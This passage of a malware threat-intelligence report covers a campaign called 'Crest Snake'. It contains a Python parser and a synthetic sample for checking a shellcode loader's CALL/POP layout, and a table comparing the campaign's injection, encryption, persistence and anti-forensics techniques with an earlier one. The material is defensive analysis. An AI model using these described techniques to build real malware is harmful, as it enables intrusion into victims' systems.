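    5 + rel32, where POP RCX recovers that address. Returns None if the buffer does
    not start with a CALL or the target is out of range.
    """
    if len(sc) < 5 or sc[0] != 0xE8:
        return None
    rel32, = struct.unpack_from("<i", sc, 1)
    target = 5 + rel32
    if not 0 <= target < len(sc):
        return None
    return {
        "loader_offset": target,
        "pop_rcx": sc[target] == 0x59,
        "blob_entropy": shannon_entropy(sc[:target]),
        "loader_entropy": shannon_entropy(sc[target:]),
    }


def build_sample(blob_len=4096, seed=7):
    """Constructed stand-in for magde.dat: returns (encrypted, plaintext)."""
    rng = random.Random(seed)
    blob = bytes(rng.getrandbits(8) for _ in range(blob_len))  # high-entropy "data blob"
    loader = b"\x59" + b"\x48\x89\xc8" * 20                    # pop rcx; mov rax, rcx; ...
    plain = b"\xe8" + struct.pack("<i", blob_len) + blob + loader
    return xor_decrypt(plain), plain


if __name__ == "__main__":
    encrypted, _ = build_sample()
    decrypted = xor_decrypt(encrypted)
    layout = parse_call_pop(decrypted)
    print(f"encrypted entropy {shannon_entropy(encrypted):.3f} bits/byte")
    print(f"loader at {layout['loader_offset']:#x}, POP RCX: {layout['pop_rcx']}, "
          f"blob {layout['blob_entropy']:.2f}, loader {layout['loader_entropy']:.2f} bits/byte")
```

Because the key is only 32 bytes and the plaintext is itself high-entropy shellcode, the encrypted file's entropy stays near 8 bits per byte either way; the CALL/POP check is the more useful confirmation that the decryption succeeded.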

Compiler

  • GCC: (x86_64-posix-seh-rev0, Built by MinGW-Builds project) 15.1.0
  • Runtime: Mingw-w64

Comparison with Nutten Tunnel — Actor Evolution

The Nutten Tunnel investigation (2026-04-02) documented a 6-stage German-targeted attack chain using AES-256-CBC encryption, Python 3.11.8 downloaded from python.org, and process injection via VirtualAllocEx/WriteProcessMemory/CreateRemoteThread.

This investigation reveals the same actor has significantly evolved:

Aspect         | Nutten Tunnel (Mar 23-31)                      | Crest Snake (Apr 1-2)
Architecture   | Single tunnel + WebDAV chain                   | 8-tunnel network (3-hop delivery)
Lure           | German bank document (DKM)                     | Scanner document + German invoice (FSL)
Target         | Germany only                                   | Germany + UK (daily campaigns: UKMar26, UKMar27, UKA01, UKA02)
Python         | 3.11.8 (downloaded at runtime)                 | 3.12 x64 (bundled in ZIP, 16.7MB)
Encryption     | AES-256-CBC (as_key.bin + as_encrypted.bin)    | XOR-32 (hardcoded key in DLL) + Kramer obfuscator
Injection      | CreateRemoteThread into explorer.exe           | Early Bird APC injection into notepad.exe
Payloads       | 1 encrypted shellcode                          | 5 Python RATs + 1 DLL + 1 shellcode
DLL            | None                                           | Custom x64 DLL with named exports
Persistence    | CryptoLoader.lnk                               | Random BAT + CertificateCheck.bat + multi-path Python execution
WsgiDAV        | v4.3.3                                         | v4.3.0 (new tunnels) + v4.3.3 (shared tunnel)
Anti-forensics | Minimal                                        | VBS helper cleanup, directory hiding, BAT self-deletion, parent process killing

Assessment: This actor is rapidly iterating. They shifted from a single-payload approach to a multi-RAT deployment in under 10 days. The addition of named DLL exports (get_payload, inject_early_bird, xor_decrypt) suggests modular tooling development. The 8-tunnel architecture provides redundancy — if one tunnel is taken down, others remain operational.


Report generated by GHOST — Breakglass Intelligence "One indicator. Total infrastructure."
